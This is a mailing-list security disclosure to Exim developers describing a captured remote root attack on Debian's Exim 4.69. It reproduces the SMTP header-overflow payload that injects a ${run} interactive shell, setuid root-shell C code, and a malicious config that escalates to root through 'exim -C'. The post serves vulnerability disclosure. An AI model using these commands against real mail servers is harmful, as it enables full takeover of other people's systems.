[exim-dev] Remote root vulnerability in Exim

Author: Sergey Kononenko
Date:  
To: exim-dev
CC: pkg-exim4-maintainers
Subject: [exim-dev] Remote root vulnerability in Exim
Hi,

While investigating a security breach in my company's network, I
captured (with tcpdump) the sequence of a successful remote root attack through
Exim. It was the Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
didn't find the email of the current Exim maintainer, so I decided to
write to these mailing lists. I don't want to publish all details of the
attack before the developers can investigate and fix the vulnerability.
So I ask the Exim maintainers to contact me and I will send them the complete
captured sequence of the attack.
Here I can put a brief sequence of the attack:

EHLO mail.domain.com
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>
DATA
MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
....
MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}........
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
..........
about 700000 of the same strings
..........
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
MAILbombMAILb
.
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>

After that the attacker gets a shell with the id of user Debian-exim and cwd
in /var/spool/exim4.
Then he puts there a setuid file with a trivial execution of a root shell:
int main(int argc, char *argv[])
{
        setuid(0);
        setgid(0);
        setgroups(0, NULL);
        execl("/bin/sh", "sh", NULL);
}


and creates another file e.conf with the following content:
spool_directory = ${run{/bin/chown
root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}

then he runs:
exim -Ce.conf -q

and gets the suid bit on /var/spool/exim4/setuid.
Everything else is trivial.

I haven't reproduced the remote part of the attack, but the escalation from Debian-exim to
root also works on exim4-daemon-light 4.72-2 from Debian Squeeze.

With best regards,
Sergey Kononenko.